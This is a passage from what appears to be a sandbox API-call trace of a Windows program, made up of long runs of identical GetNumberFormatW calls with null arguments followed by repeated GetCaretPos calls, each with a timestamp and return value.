lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.911] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.912] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.913] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.914] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.915] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.915] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.915] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.915] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.915] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.915] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.915] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.915] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.915] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.915] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.915] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.915] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.915] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.915] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.915] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.915] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.915] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.915] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.915] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.915] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0121.915] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0125.558] GetCaretPos (in: 